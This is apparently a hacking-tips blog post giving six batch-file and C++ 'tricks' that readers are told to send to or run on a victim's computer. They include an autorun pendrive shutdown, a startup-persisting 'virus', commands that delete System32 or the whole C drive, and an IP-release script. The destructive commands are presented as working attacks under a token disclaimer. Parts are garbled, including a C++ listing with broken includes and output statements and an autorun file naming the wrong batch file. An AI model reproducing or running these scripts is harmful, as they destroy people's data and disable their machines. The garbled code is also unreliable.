This post is about 6 Notepad tricks that are dangerous and fun to use. Try to use this tricks on any old computer to have fun. We are not responsible for any damages happen to your computer. This is for an educational purpose only.
1.Hack Friends Computer Using pendrive:
Step 1: copy this code into notepad:
@echo off
shutdown -s -t 00
Save as techack.bat extension.
Step 2: Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable
Save it as autorun.inf
Step 3: Then copy the two files in your pen drive or victim's pen drive. That's all whenever the victim insert his
pen drive,the system will be turned off automatically.
Check How to Disable This:-
First you have to stop Autorun in Your Computer and then Format pendrive. To do so, learn the trick from previous post.
2.How To Create MOST DANGEROUS VIRUS:
Step 1: Open notepad and Copy This code
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{
keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0); keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{ char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{ {
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp fp fp } } else { while
(!input.eof())
{ input.getline(buffer,255);
} } }
{ char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{ { { ofstream fp("CLICK.bat", ios::app);
fp fp fp fp }
system("START CLICK.bat");
main();
} } else { while
(!input.eof())
{ input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
} } }
START:{ for(int i = 0; i < 1; i++)
{ int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout cout cout cout cout cout cout cout cout cout cout cout Sleep(60);
} }
for ( int j = 0; j < 5; j++) { SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout }
goto START;
Step 2: Save it as techack.bat and run it on your victim's computer.
3.How To Damage A Laptop:
Step 1: Open Notepad and copy this code
del c:\WINDOWS\system32\*.*/q
Step 2: Save as techack.bat.
If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows PC cant be started
4.How to stop someone's internet access:
Step 1: Open Notepad and copy this code
@Echo off
Ipconfig /release
Step 2: Save that as techack.bat and send it to the victim.
When they open it their IP address will be lost, and therefore they won't be able to fix it. However, this is VERY easy to fix. Simply type in IPconfig /renew
5.How To Make more than thousands of folder Using notepad:
Step 1: Open notepad and Copy this code
@echo off
:top
md %random%
goto top
Step 2: Save it as techack.bat
If you will open that file that folder will be rained by more than thousand of folders. It will not cause any harm to your computer, if you want you can try this.
6.Learn To Make Dangerous Virus In A Minute:
In this I will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. You will create this virus using batch file programming. This virus will delete the C Drive completely.
How to Make the virus ?
Step 1: Open Notepad and copy this code.
{ @Echo off
Del C:\ *.* |y }
Del C:\ *.* |y }
Step 2: Save this file as techack.bat
Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. We are not responsible for any damage done to your computer.
Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. We are not responsible for any damage done to your computer.
Note: You can save techack.bat with any name like ******.bat. But .bat extension is necessary.
Hope you enjoy this post. For any queries or suggestions please mention in the below comment box. Thank you...!!!

.png)
No comments:
Post a Comment